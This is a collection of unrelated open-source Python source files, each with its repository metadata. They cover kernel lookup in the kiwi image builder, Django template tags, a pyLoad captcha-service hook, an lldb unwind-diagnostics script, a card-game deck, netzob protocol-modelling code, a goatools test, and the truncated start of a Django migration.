        Lookup kernel files and provide filename and version

        :param bool raise_on_not_found: sets the method to raise an exception
            if the kernel is not found
        :raises KiwiKernelLookupError: if raise_on_not_found flag is active
            and kernel is not found
        :return: tuple with filename, kernelname and version
        :rtype: namedtuple
        """
        for kernel_name in self.kernel_names:
            kernel_file = os.sep.join(
                [self.root_dir, 'boot', kernel_name]
            )
            if os.path.exists(kernel_file):
                # The version is everything after the first dash in the
                # image file name, e.g. vmlinuz-5.3.18-default -> 5.3.18-default
                version_match = re.match(
                    '.*?-(.*)', os.path.basename(kernel_file)
                )
                if version_match:
                    version = version_match.group(1)
                    kernel = namedtuple(
                        'kernel', ['name', 'filename', 'version']
                    )
                    # name resolves symlinks so it reports the real image file
                    return kernel(
                        name=os.path.basename(os.path.realpath(kernel_file)),
                        filename=kernel_file,
                        version=version
                    )
        if raise_on_not_found:
            raise KiwiKernelLookupError(
                'No kernel found in {0}, searched for {1}'.format(
                    os.sep.join([self.root_dir, 'boot']),
                    ','.join(self.kernel_names)
                )
            )
    def get_xen_hypervisor(self):
        """
        Lookup xen hypervisor and provide filename and hypervisor name

        Returns None implicitly when <root_dir>/boot/xen.gz does not exist.

        :return: tuple with filename and hypervisor name
        :rtype: namedtuple
        """
        xen_hypervisor = self.root_dir + '/boot/xen.gz'
        if os.path.exists(xen_hypervisor):
            xen = namedtuple(
                'xen', ['filename', 'name']
            )
            return xen(
                filename=xen_hypervisor,
                name='xen.gz'
            )
    def copy_kernel(self, target_dir, file_name=None):
        """
        Copy kernel to specified target

        If no file_name is given the target filename is set
        as kernel-<kernel.version>.kernel

        :param str target_dir: target path name
        :param str file_name: base filename in target
        """
        kernel = self.get_kernel()
        if kernel:
            if not file_name:
                file_name = 'kernel-' + kernel.version + '.kernel'
            target_file = ''.join(
                [target_dir, '/', file_name]
            )
            Command.run(['cp', kernel.filename, target_file])
    def copy_xen_hypervisor(self, target_dir, file_name=None):
        """
        Copy xen hypervisor to specified target

        If no file_name is given the target filename is set
        as hypervisor-<xen.name>

        :param str target_dir: target path name
        :param str file_name: base filename in target
        """
        xen = self.get_xen_hypervisor()
        if xen:
            if not file_name:
                file_name = 'hypervisor-' + xen.name
            target_file = ''.join(
                [target_dir, '/', file_name]
            )
            Command.run(['cp', xen.filename, target_file])
    def _setup_kernel_names_for_lookup(self):
        """
        The kernel image name is different per arch and distribution

        This method returns a list of possible kernel image names in
        order to search and find one of them

        :return: list of kernel image names
        :rtype: list
        """
        kernel_names = []
        # One directory per installed kernel version lives below /lib/modules
        kernel_dirs = sorted(
            os.listdir(''.join([self.root_dir, '/lib/modules']))
        )
        if kernel_dirs:
            # append lookup for the real kernel image names
            # depending on the arch and os they are different
            # in their prefix
            kernel_prefixes = [
                'uImage', 'Image', 'zImage', 'vmlinuz', 'image', 'vmlinux'
            ]
            kernel_name_pattern = '{prefix}-{name}'
            for kernel_prefix in kernel_prefixes:
                for kernel_dir in kernel_dirs:
                    kernel_names.append(
                        kernel_name_pattern.format(
                            prefix=kernel_prefix, name=kernel_dir
                        )
                    )
        return kernel_names
| b1-systems/kiwi | kiwi/system/kernel.py | Python | gpl-3.0 | 5,751 |
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django import template
from POS.models import CorpPOS
from POS.utils import add_status_info
# Template tag registry for this module; Django picks it up via {% load %}.
register=template.Library()
@register.inclusion_tag('posstatus.html')
def myposstatus(user):
    """Render the POS status table for every POS managed by `user`."""
    managed = CorpPOS.objects.filter(manager=user)
    return {'posstatus': add_status_info(managed)}
@register.inclusion_tag('posstatus.html')
def corpposstatus(user):
    """Render the corp-wide POS status table.

    Users holding the 'POS.can_see_all_pos' permission see every corp POS;
    everyone else only sees the unmanaged ones (manager is None).
    """
    if user.has_perm('POS.can_see_all_pos'):
        visible = CorpPOS.objects.all()
    else:
        visible = CorpPOS.objects.filter(manager=None)
    return {'posstatus': add_status_info(visible)}
@register.inclusion_tag('posstatus_detail.html')
def posstatusdetails(status):
    """Render the detail template for a single POS status entry."""
    return dict(pos=status)
| reactormonk/eve-wspace | evewspace/POS/templatetags/posstatus.py | Python | gpl-3.0 | 1,782 |
# -*- coding: utf-8 -*-
from __future__ import with_statement
import base64
import uuid
import pycurl
from module.network.HTTPRequest import BadHeader
from module.network.RequestFactory import getRequest as get_request
from module.plugins.internal.Addon import Addon
from module.plugins.internal.misc import threaded
class ExpertDecoders(Addon):
    """pyLoad hook that off-loads captcha solving to expertdecoders.com."""
    __name__ = "ExpertDecoders"
    __type__ = "hook"
    __version__ = "0.09"
    __status__ = "testing"
    __config__ = [("activated", "bool", "Activated", False),
                  ("passkey", "password", "Access key", ""),
                  ("check_client", "bool", "Don't use if client is connected", True)]
    __description__ = """Send captchas to expertdecoders.com"""
    __license__ = "GPLv3"
    __authors__ = [("RaNaN", "RaNaN@pyload.org"),
                   ("zoidberg", "zoidberg@mujmail.cz")]
    # Service endpoint used for all actions (balance, upload, refund).
    API_URL = "http://www.fasttypers.org/imagepost.ashx"
    def get_credits(self):
        """Query the account balance; the API answers a bare integer on success.

        Returns the remaining credits (also cached in self.info['credits']),
        or 0 when the response is not a number (treated as an error).
        """
        res = self.load(
            self.API_URL,
            post={
                'key': self.config.get('passkey'),
                'action': "balance"})
        if res.isdigit():
            self.log_info(_("%s credits left") % res)
            self.info['credits'] = credits = int(res)
            return credits
        else:
            self.log_error(res)
            return 0
    @threaded
    def _process_captcha(self, task):
        """Upload the captcha image and hand the service's answer to the task.

        Runs in a worker thread (@threaded).  The generated ticket id is
        stored on the task so a later refund request can reference it.
        """
        task.data['ticket'] = ticket = uuid.uuid4()
        result = None
        with open(task.captchaFile, 'rb') as f:
            data = f.read()
        req = get_request()
        #: Raise timeout threshold
        req.c.setopt(pycurl.LOW_SPEED_TIME, 80)
        try:
            result = self.load(self.API_URL,
                               post={'action': "upload",
                                     'key': self.config.get('passkey'),
                                     'file': base64.b64encode(data),
                                     'gen_task_id': ticket},
                               req=req)
        finally:
            req.close()
        self.log_debug("Result %s : %s" % (ticket, result))
        task.setResult(result)
    def captcha_task(self, task):
        """Decide whether this hook handles the given captcha task.

        Skips non-textual captchas, missing passkey, a connected GUI client
        (when configured), and accounts without credits.
        """
        if not task.isTextual():
            return False
        if not self.config.get('passkey'):
            return False
        if self.pyload.isClientConnected() and self.config.get('check_client'):
            return False
        if self.get_credits() > 0:
            task.handler.append(self)
            task.setWaiting(100)
            self._process_captcha(task)
        else:
            self.log_info(
                _("Your ExpertDecoders Account has not enough credits"))
    def captcha_invalid(self, task):
        """Request a refund for a captcha the service solved incorrectly."""
        if "ticket" in task.data:
            try:
                res = self.load(self.API_URL,
                                post={'action': "refund", 'key': self.config.get('passkey'), 'gen_task_id': task.data['ticket']})
                self.log_info(_("Request refund"), res)
            except BadHeader as e:
                self.log_error(_("Could not send refund request"), e)
# This implements the "diagnose-unwind" command, usually installed
# in the debug session like
# command script import lldb.diagnose
# it is used when lldb's backtrace fails -- it collects and prints
# information about the stack frames, and tries an alternate unwind
# algorithm, that will help to understand why lldb's unwind algorithm
# did not succeed.
import optparse
import lldb
import re
import shlex
# Print the frame number, pc, frame pointer, module UUID and function name
# Returns the SBModule that contains the PC, if it could be found
def backtrace_print_frame (target, frame_num, addr, fp):
    process = target.GetProcess()
    addr_for_printing = addr
    addr_width = process.GetAddressByteSize() * 2
    # For frames above 0, back the pc up by one byte so it resolves into the
    # call instruction instead of the return address (which may fall into
    # the next function).
    if frame_num > 0:
        addr = addr - 1
    sbaddr = lldb.SBAddress()
    try:
        sbaddr.SetLoadAddress(addr, target)
        module_description = ""
        if sbaddr.GetModule():
            module_filename = ""
            module_uuid_str = sbaddr.GetModule().GetUUIDString()
            if module_uuid_str == None:
                module_uuid_str = ""
            if sbaddr.GetModule().GetFileSpec():
                module_filename = sbaddr.GetModule().GetFileSpec().GetFilename()
                if module_filename == None:
                    module_filename = ""
            if module_uuid_str != "" or module_filename != "":
                module_description = '%s %s' % (module_filename, module_uuid_str)
    except Exception:
        # Address could not be resolved at all - print the raw pc/fp pair.
        print '%2d: pc==0x%-*x fp==0x%-*x' % (frame_num, addr_width, addr_for_printing, addr_width, fp)
        return
    sym_ctx = target.ResolveSymbolContextForAddress(sbaddr, lldb.eSymbolContextEverything)
    if sym_ctx.IsValid() and sym_ctx.GetSymbol().IsValid():
        # Symbol found: also print the function name and pc offset into it.
        function_start = sym_ctx.GetSymbol().GetStartAddress().GetLoadAddress(target)
        offset = addr - function_start
        print '%2d: pc==0x%-*x fp==0x%-*x %s %s + %d' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description, sym_ctx.GetSymbol().GetName(), offset)
    else:
        print '%2d: pc==0x%-*x fp==0x%-*x %s' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description)
    return sbaddr.GetModule()
# A simple stack walk algorithm that follows the frame chain.
# Returns a two-element list; the first element is a list of modules
# seen and the second element is a list of addresses seen during the backtrace.
def simple_backtrace(debugger):
    target = debugger.GetSelectedTarget()
    process = target.GetProcess()
    cur_thread = process.GetSelectedThread()
    initial_fp = cur_thread.GetFrameAtIndex(0).GetFP()
    # If the pseudoreg "fp" isn't recognized, on arm hardcode to r7 which is correct for Darwin programs.
    if initial_fp == lldb.LLDB_INVALID_ADDRESS and target.triple[0:3] == "arm":
        for reggroup in cur_thread.GetFrameAtIndex(1).registers:
            if reggroup.GetName() == "General Purpose Registers":
                for reg in reggroup:
                    if reg.GetName() == "r7":
                        initial_fp = int (reg.GetValue(), 16)
    module_list = []
    address_list = [cur_thread.GetFrameAtIndex(0).GetPC()]
    # Frame 0 comes straight from the live register context.
    this_module = backtrace_print_frame (target, 0, cur_thread.GetFrameAtIndex(0).GetPC(), initial_fp)
    print_stack_frame (process, initial_fp)
    print ""
    if this_module != None:
        module_list.append (this_module)
    if cur_thread.GetNumFrames() < 2:
        return [module_list, address_list]
    # Seed the walk with the saved fp/pc pair stored in frame 0's frame record.
    cur_fp = process.ReadPointerFromMemory (initial_fp, lldb.SBError())
    cur_pc = process.ReadPointerFromMemory (initial_fp + process.GetAddressByteSize(), lldb.SBError())
    frame_num = 1
    while cur_pc != 0 and cur_fp != 0 and cur_pc != lldb.LLDB_INVALID_ADDRESS and cur_fp != lldb.LLDB_INVALID_ADDRESS:
        address_list.append (cur_pc)
        this_module = backtrace_print_frame (target, frame_num, cur_pc, cur_fp)
        print_stack_frame (process, cur_fp)
        print ""
        if this_module != None:
            module_list.append (this_module)
        frame_num = frame_num + 1
        next_pc = 0
        next_fp = 0
        if target.triple[0:6] == "x86_64" or target.triple[0:4] == "i386" or target.triple[0:3] == "arm":
            error = lldb.SBError()
            next_pc = process.ReadPointerFromMemory(cur_fp + process.GetAddressByteSize(), error)
            if not error.Success():
                next_pc = 0
            next_fp = process.ReadPointerFromMemory(cur_fp, error)
            if not error.Success():
                next_fp = 0
        # Clear the 0th bit for arm frames - this indicates it is a thumb frame
        if target.triple[0:3] == "arm" and (next_pc & 1) == 1:
            next_pc = next_pc & ~1
        cur_pc = next_pc
        cur_fp = next_fp
    # Print the final (terminating) pc/fp pair as well.
    this_module = backtrace_print_frame (target, frame_num, cur_pc, cur_fp)
    print_stack_frame (process, cur_fp)
    print ""
    if this_module != None:
        module_list.append (this_module)
    return [module_list, address_list]
# Dump the first five pointer-sized words of the frame record starting at
# $fp-2*wordsize, to help eyeball saved fp/pc values around the frame pointer.
def print_stack_frame(process, fp):
    if fp == 0 or fp == lldb.LLDB_INVALID_ADDRESS or fp == 1:
        return
    addr_size = process.GetAddressByteSize()
    addr = fp - (2 * addr_size)
    i = 0
    outline = "Stack frame from $fp-%d: " % (2 * addr_size)
    error = lldb.SBError()
    try:
        while i < 5 and error.Success():
            address = process.ReadPointerFromMemory(addr + (i * addr_size), error)
            outline += " 0x%x" % address
            i += 1
        print outline
    except Exception:
        # Memory read failures are non-fatal; just skip the dump.
        return
def diagnose_unwind(debugger, command, result, dict):
    """
    Gather diagnostic information to help debug incorrect unwind (backtrace)
    behavior in lldb. When there is a backtrace that doesn't look
    correct, run this command with the correct thread selected and a
    large amount of diagnostic information will be printed, it is likely
    to be helpful when reporting the problem.
    """
    command_args = shlex.split(command)
    parser = create_diagnose_unwind_options()
    try:
        (options, args) = parser.parse_args(command_args)
    except:
        return
    target = debugger.GetSelectedTarget()
    if target:
        process = target.GetProcess()
        if process:
            thread = process.GetSelectedThread()
            if thread:
                # Parse the lldb version out of the version banner, e.g. "lldb-310.2.1".
                lldb_versions_match = re.search(r'[lL][lL][dD][bB]-(\d+)([.](\d+))?([.](\d+))?', debugger.GetVersionString())
                # NOTE(review): lldb_version is initialized but never set or
                # used again below; lldb_major/lldb_minor are what get filled in.
                lldb_version = 0
                lldb_minor = 0
                if len(lldb_versions_match.groups()) >= 1 and lldb_versions_match.groups()[0]:
                    lldb_major = int(lldb_versions_match.groups()[0])
                if len(lldb_versions_match.groups()) >= 5 and lldb_versions_match.groups()[4]:
                    lldb_minor = int(lldb_versions_match.groups()[4])
                modules_seen = []
                addresses_seen = []
                print 'LLDB version %s' % debugger.GetVersionString()
                print 'Unwind diagnostics for thread %d' % thread.GetIndexID()
                print ""
                print "============================================================================================="
                print ""
                print "OS plugin setting:"
                debugger.HandleCommand("settings show target.process.python-os-plugin-path")
                print ""
                print "Live register context:"
                thread.SetSelectedFrame(0)
                debugger.HandleCommand("register read")
                print ""
                print "============================================================================================="
                print ""
                # Section 1: lldb's own unwinder output (non-inlined frames only).
                print "lldb's unwind algorithm:"
                print ""
                frame_num = 0
                for frame in thread.frames:
                    if not frame.IsInlined():
                        this_module = backtrace_print_frame (target, frame_num, frame.GetPC(), frame.GetFP())
                        print_stack_frame (process, frame.GetFP())
                        print ""
                        if this_module != None:
                            modules_seen.append (this_module)
                        addresses_seen.append (frame.GetPC())
                        frame_num = frame_num + 1
                print ""
                print "============================================================================================="
                print ""
                # Section 2: the independent frame-chain walk, for comparison.
                print "Simple stack walk algorithm:"
                print ""
                (module_list, address_list) = simple_backtrace(debugger)
                if module_list and module_list != None:
                    modules_seen += module_list
                if address_list and address_list != None:
                    addresses_seen = set(addresses_seen)
                    addresses_seen.update(set(address_list))
                print ""
                print "============================================================================================="
                print ""
                # Section 3: image list entries for every module seen, deduplicated.
                print "Modules seen in stack walks:"
                print ""
                modules_already_seen = set()
                for module in modules_seen:
                    if module != None and module.GetFileSpec().GetFilename() != None:
                        if not module.GetFileSpec().GetFilename() in modules_already_seen:
                            debugger.HandleCommand('image list %s' % module.GetFileSpec().GetFilename())
                            modules_already_seen.add(module.GetFileSpec().GetFilename())
                print ""
                print "============================================================================================="
                print ""
                # Section 4: disassembly around every address seen by either walk.
                # NOTE(review): "ofaddresses" in the banner below is a typo in the
                # original output string, kept as-is to preserve behavior.
                print "Disassembly ofaddresses seen in stack walks:"
                print ""
                additional_addresses_to_disassemble = addresses_seen
                for frame in thread.frames:
                    if not frame.IsInlined():
                        print "--------------------------------------------------------------------------------------"
                        print ""
                        print "Disassembly of %s, frame %d, address 0x%x" % (frame.GetFunctionName(), frame.GetFrameID(), frame.GetPC())
                        print ""
                        if target.triple[0:6] == "x86_64" or target.triple[0:4] == "i386":
                            debugger.HandleCommand('disassemble -F att -a 0x%x' % frame.GetPC())
                        else:
                            debugger.HandleCommand('disassemble -a 0x%x' % frame.GetPC())
                        if frame.GetPC() in additional_addresses_to_disassemble:
                            additional_addresses_to_disassemble.remove (frame.GetPC())
                for address in list(additional_addresses_to_disassemble):
                    print "--------------------------------------------------------------------------------------"
                    print ""
                    print "Disassembly of 0x%x" % address
                    print ""
                    if target.triple[0:6] == "x86_64" or target.triple[0:4] == "i386":
                        debugger.HandleCommand('disassemble -F att -a 0x%x' % address)
                    else:
                        debugger.HandleCommand('disassemble -a 0x%x' % address)
                print ""
                print "============================================================================================="
                print ""
                # Section 5: unwind rules for every address seen by either walk.
                additional_addresses_to_show_unwind = addresses_seen
                for frame in thread.frames:
                    if not frame.IsInlined():
                        print "--------------------------------------------------------------------------------------"
                        print ""
                        print "Unwind instructions for %s, frame %d" % (frame.GetFunctionName(), frame.GetFrameID())
                        print ""
                        debugger.HandleCommand('image show-unwind -a "0x%x"' % frame.GetPC())
                        if frame.GetPC() in additional_addresses_to_show_unwind:
                            additional_addresses_to_show_unwind.remove (frame.GetPC())
                for address in list(additional_addresses_to_show_unwind):
                    print "--------------------------------------------------------------------------------------"
                    print ""
                    print "Unwind instructions for 0x%x" % address
                    print ""
                    debugger.HandleCommand('image show-unwind -a "0x%x"' % address)
def create_diagnose_unwind_options():
usage = "usage: %prog"
description='''Print diagnostic information about a thread backtrace which will help to debug unwind problems'''
parser = optparse.OptionParser(description=description, prog='diagnose_unwind',usage=usage)
return parser
# Register the command with lldb and announce it; runs when this module is
# imported into a debug session via `command script import`.
lldb.debugger.HandleCommand('command script add -f %s.diagnose_unwind diagnose-unwind' % __name__)
print 'The "diagnose-unwind" command has been installed, type "help diagnose-unwind" for detailed help.'
| s20121035/rk3288_android5.1_repo | external/lldb/examples/python/diagnose_unwind.py | Python | gpl-3.0 | 11,798 |
'''
Created on Nov 3, 2016
The set of cards in the deck
@author: mjw
'''
from random import randint
from .Baron import Baron
from .Countess import Countess
from .Prince import Prince
from .Priest import Priest
from .Princess import Princess
from .King import King
from .Guard import Guard
from .Handmaid import Handmaid
import random
class Deck(object):
    '''
    The Deck contains all the cards in the game. It instantiates itself
    with a random permutation of the standard Love Letter deck and exposes
    a way to draw cards from the top of that permutation.
    '''

    # Card classes making up the standard 16-card Love Letter deck.
    unshuffled = [Princess, Countess, King, Prince, Prince,
                  Handmaid, Handmaid, Baron, Baron, Priest,
                  Priest, Guard, Guard, Guard, Guard, Guard]

    def __init__(self):
        '''
        Instantiate one card per class listed in `unshuffled`, then
        shuffle the resulting list to get a random deck order.
        '''
        self.shuffled = [clazz() for clazz in Deck.unshuffled]
        random.shuffle(self.shuffled)

    def size(self):
        '''Return the number of cards remaining in the deck.'''
        return len(self.shuffled)

    def getCard(self):
        '''Remove and return the top card, or None when the deck is empty.'''
        if not self.shuffled:
            return None
        # pop(0) drops the top card in place instead of rebuilding the
        # whole remaining list with a slice on every draw.
        return self.shuffled.pop(0)
# -*- coding: utf-8 -*-
# +---------------------------------------------------------------------------+
# | 01001110 01100101 01110100 01111010 01101111 01100010 |
# | |
# | Netzob : Inferring communication protocols |
# +---------------------------------------------------------------------------+
# | Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
# | This program is free software: you can redistribute it and/or modify |
# | it under the terms of the GNU General Public License as published by |
# | the Free Software Foundation, either version 3 of the License, or |
# | (at your option) any later version. |
# | |
# | This program is distributed in the hope that it will be useful, |
# | but WITHOUT ANY WARRANTY; without even the implied warranty of |
# | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
# | GNU General Public License for more details. |
# | |
# | You should have received a copy of the GNU General Public License |
# | along with this program. If not, see <http://www.gnu.org/licenses/>. |
# +---------------------------------------------------------------------------+
# | @url : http://www.netzob.org |
# | @contact : contact@netzob.org |
# | @sponsors : Amossys, http://www.amossys.fr |
# | Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
# +---------------------------------------------------------------------------+
# +---------------------------------------------------------------------------+
# | File contributors : |
# | - Georges Bossert <georges.bossert (a) supelec.fr> |
# | - Frédéric Guihéry <frederic.guihery (a) amossys.fr> |
# +---------------------------------------------------------------------------+
# +---------------------------------------------------------------------------+
# | Standard library imports |
# +---------------------------------------------------------------------------+
import random
from bitarray import bitarray
# +---------------------------------------------------------------------------+
# | Related third party imports |
# +---------------------------------------------------------------------------+
# +---------------------------------------------------------------------------+
# | Local application imports |
# +---------------------------------------------------------------------------+
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Vocabulary.Domain.Variables.Nodes.AbstractVariableNode import AbstractVariableNode
from netzob.Common.Models.Vocabulary.Domain.Parser.ParsingPath import ParsingPath
from netzob.Common.Models.Vocabulary.Domain.Specializer.SpecializingPath import SpecializingPath
@NetzobLogger
class Repeat(AbstractVariableNode):
    """Represents a Repeat in the domain definition
    Let's see how a repeat domain can be parsed
    >>> from netzob.all import *
    >>> f1 = Field(Repeat(ASCII("netzob"), nbRepeat=(1, 4)))
    >>> f2 = Field(ASCII("zoby"))
    >>> s = Symbol([f1, f2])
    >>> msg1 = RawMessage("netzobnetzobzoby")
    >>> mp = MessageParser()
    >>> print mp.parseMessage(msg1, s)
    [bitarray('011011100110010101110100011110100110111101100010011011100110010101110100011110100110111101100010'), bitarray('01111010011011110110001001111001')]
    You can also specify a delimitor between each repeated element
    >>> from netzob.all import *
    >>> f1 = Field(Repeat(Alt([ASCII("netzob"), ASCII("zoby")]), nbRepeat=(1, 4), delimitor=TypeConverter.convert(";", Raw, BitArray)))
    >>> f2 = Field(ASCII("zoby"))
    >>> s = Symbol([f1, f2])
    >>> msg1 = RawMessage("netzob;zoby;netzobzoby")
    >>> mp = MessageParser()
    >>> print mp.parseMessage(msg1, s)
    [bitarray('011011100110010101110100011110100110111101100010001110110111101001101111011000100111100100111011011011100110010101110100011110100110111101100010'), bitarray('01111010011011110110001001111001')]
    Let's illustrate the specialization of a repeat:
    >>> from netzob.all import *
    >>> f1 = Field(Repeat(ASCII("netzob"), nbRepeat=2))
    >>> s = Symbol([f1])
    >>> print s.specialize()
    netzobnetzob
    >>> from netzob.all import *
    >>> f1 = Field(Repeat(IPv4(), nbRepeat=3, delimitor=TypeConverter.convert(";", Raw, BitArray)))
    >>> s = Symbol([f1])
    >>> gen = s.specialize()
    >>> len(gen) == 14
    True
    >>> gen.count(";")
    2
    >>> from netzob.all import *
    >>> child = Data(dataType=ASCII(nbChars=(5)), svas=SVAS.PERSISTENT)
    >>> f1 = Field(Repeat(child, nbRepeat=3, delimitor=TypeConverter.convert(";", Raw, BitArray)))
    >>> s = Symbol([f1])
    >>> gen = s.specialize()
    >>> gen == gen[:5]+";"+gen[:5]+";"+gen[:5]
    True
    """
    def __init__(self, child, nbRepeat, delimitor=None):
        # child: the single variable that gets repeated (stored as the only
        # element of self.children).
        # nbRepeat: an int or a (min, max) tuple; normalized by the setter.
        # delimitor: optional bitarray inserted between consecutive repetitions.
        super(Repeat, self).__init__(self.__class__.__name__, [child])
        self.nbRepeat = nbRepeat
        self.delimitor = delimitor
    @typeCheck(ParsingPath)
    def parse(self, parsingPath, carnivorous=False):
        """Parse the content with the definition domain of the Repeat
        """
        if parsingPath is None:
            raise Exception("Parsing path cannot be None")
        # retrieve the data to parse
        dataToParse = parsingPath.getDataAssignedToVariable(self).copy()
        # remove any data assigned to this variable
        parsingPath.removeAssignedDataToVariable(self)
        self._logger.debug("Parse '{0}' as {1} with parser path '{2}'".format(dataToParse, self, parsingPath))
        results = []
        # we try to parse according to the various different number of repetitions
        # NOTE(review): xrange's upper bound is exclusive, so nbRepeat[1]
        # repetitions is never attempted here; also a None maximum (accepted by
        # the nbRepeat setter) would make xrange raise a TypeError -- confirm
        # whether those cases are intended to be unreachable.
        for i_repeat in xrange(self.nbRepeat[0], self.nbRepeat[1]):
            # start each repetition count from a fresh copy of the path, with
            # the full data handed to the child variable
            newParsingPaths = [parsingPath.duplicate()]
            newParsingPaths[0].assignDataToVariable(dataToParse.copy(), self.children[0])
            for i in xrange(i_repeat):
                tmp_result = []
                for newParsingPath in newParsingPaths:
                    # every way the child can consume a prefix of the remaining
                    # data yields a candidate path
                    childParsingPaths = self.children[0].parse(newParsingPath, carnivorous=carnivorous)
                    for childParsingPath in childParsingPaths:
                        if childParsingPath.isDataAvailableForVariable(self):
                            # accumulate the child's parsed data after what this
                            # Repeat already consumed on this path
                            newResult = childParsingPath.getDataAssignedToVariable(self).copy()
                            newResult += childParsingPath.getDataAssignedToVariable(self.children[0])
                        else:
                            newResult = childParsingPath.getDataAssignedToVariable(self.children[0])
                        childParsingPath.addResult(self, newResult)
                        childParsingPath.assignDataToVariable(dataToParse.copy()[len(newResult):], self.children[0])
                        if self.delimitor is not None:
                            if i < i_repeat - 1:
                                # check the delimitor is available
                                toParse = childParsingPath.getDataAssignedToVariable(self.children[0]).copy()
                                if toParse[:len(self.delimitor)] == self.delimitor:
                                    # consume the delimitor as part of this
                                    # Repeat's result; paths without it are dropped
                                    newResult = childParsingPath.getDataAssignedToVariable(self).copy() + self.delimitor
                                    childParsingPath.addResult(self, newResult)
                                    childParsingPath.assignDataToVariable(dataToParse.copy()[len(newResult):], self.children[0])
                                    tmp_result.append(childParsingPath)
                            else:
                                # last repetition: no trailing delimitor expected
                                tmp_result.append(childParsingPath)
                        else:
                            # no delimitor configured: keep the path as-is
                            tmp_result.append(childParsingPath)
                newParsingPaths = tmp_result
            for newParsingPath in newParsingPaths:
                results.append(newParsingPath)
        return results
    @typeCheck(SpecializingPath)
    def specialize(self, originalSpecializingPath):
        """Specializes a Repeat"""
        if originalSpecializingPath is None:
            raise Exception("Specializing path cannot be None")
        # initially, there is a unique path to specialize (the provided one)
        specializingPaths = []
        # NOTE(review): same exclusive upper bound as in parse() -- nbRepeat[1]
        # repetitions is never generated here.
        for i_repeat in xrange(self.nbRepeat[0], self.nbRepeat[1]):
            newSpecializingPaths = [originalSpecializingPath.duplicate()]
            for i in xrange(i_repeat):
                childSpecializingPaths = []
                for newSpecializingPath in newSpecializingPaths:
                    for path in self.children[0].specialize(newSpecializingPath):
                        if path.isDataAvailableForVariable(self):
                            # append the child's generated value (and the
                            # delimitor, when defined) to what was already produced
                            newResult = path.getDataAssignedToVariable(self).copy()
                            if self.delimitor is not None:
                                newResult += self.delimitor
                            newResult += path.getDataAssignedToVariable(self.children[0])
                        else:
                            newResult = path.getDataAssignedToVariable(self.children[0])
                        path.addResult(self, newResult)
                        childSpecializingPaths.append(path)
                newSpecializingPaths = childSpecializingPaths
            specializingPaths.extend(newSpecializingPaths)
        # lets shuffle this ( :) ) >>> by default we only consider the first valid parsing path.
        random.shuffle(specializingPaths)
        return specializingPaths
    @property
    def nbRepeat(self):
        # Always a (min, max) tuple after the setter has run; max is exclusive
        # in practice (see parse/specialize) and may be None.
        return self.__nbRepeat
    @nbRepeat.setter
    def nbRepeat(self, nbRepeat):
        if nbRepeat is None:
            raise Exception("NB Repeat cannot be None")
        MAX_REPEAT = 1000
        if isinstance(nbRepeat, int):
            # a plain int n is normalized to (n, n + 1) so that the exclusive
            # xrange in parse/specialize yields exactly n repetitions
            nbRepeat = (nbRepeat, nbRepeat + 1)
        if isinstance(nbRepeat, tuple):
            minNbRepeat, maxNbRepeat = nbRepeat
            if minNbRepeat is not None and not isinstance(minNbRepeat, int):
                raise TypeError("NbRepeat must be defined with a tuple of int")
            if maxNbRepeat is not None and not isinstance(maxNbRepeat, int):
                raise TypeError("NbRepeat must be defined with a tuple of int")
            if minNbRepeat is None:
                minNbRepeat = 0
            if minNbRepeat < 0:
                raise ValueError("Minimum nbRepeat must be greater than 0")
            if maxNbRepeat is not None and maxNbRepeat < minNbRepeat:
                raise ValueError("Maximum must be greater or equals to the minimum")
            if maxNbRepeat is not None and maxNbRepeat > MAX_REPEAT:
                raise ValueError("Maximum nbRepeat supported for a variable is {0}.".format(MAX_REPEAT))
        self.__nbRepeat = (minNbRepeat, maxNbRepeat)
    @property
    def delimitor(self):
        # Optional bitarray separating two repetitions; None means no separator.
        return self.__delimitor
    @delimitor.setter
    @typeCheck(bitarray)
    def delimitor(self, delimitor):
        self.__delimitor = delimitor
| dasbruns/netzob | src/netzob/Common/Models/Vocabulary/Domain/Variables/Nodes/Repeat.py | Python | gpl-3.0 | 11,690 |
#!/usr/bin/env python
"""Full set of annotations can be used to set TermCounts. No need to break it up."""
# https://github.com/tanghaibao/goatools/issues/88
from __future__ import print_function
import os
import sys
from goatools.semantic import TermCounts
from goatools.base import get_godag
from goatools.associations import read_annotations
# Repository root (one level above this test file); used to locate data files.
REPO = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")
def test_semantic_i88():
    """Full set of annotations can be used to set TermCounts. No need to break it up."""
    godag = get_godag("go-basic.obo")
    # Associations, loaded once per namespace (ALL first, then the three subsets)
    fin_gaf = os.path.join(REPO, "tair.gaf")
    namespaces = ('ALL', 'BP', 'MF', 'CC')
    ns2assoc = {ns: read_annotations(gaf=fin_gaf, namespace=ns) for ns in namespaces}
    # Termcounts for the full set and for each namespace subset
    prt = sys.stdout
    ns2tcnt = {ns: TermCounts(godag, ns2assoc[ns], prt=prt) for ns in namespaces}
    # Every count found in a namespace subset must match the full-set count
    gocnts_all = ns2tcnt['ALL'].gocnts
    for namespace in ('BP', 'MF', 'CC'):
        for goid, cnt in ns2tcnt[namespace].gocnts.items():
            assert gocnts_all[goid] == cnt
if __name__ == '__main__':
    # Allow running this test directly as a script (outside pytest).
    test_semantic_i88()
| tanghaibao/goatools | tests/semantic_ns.py | Python | bsd-2-clause | 1,596 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
import xmodule_django.models
class Migration(migrations.Migration):
    # Initial migration for the bulk_email app. Migrations are frozen history:
    # do not edit the operations below; add a new migration instead.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # Per-course flag enabling the bulk email feature.
        migrations.CreateModel(
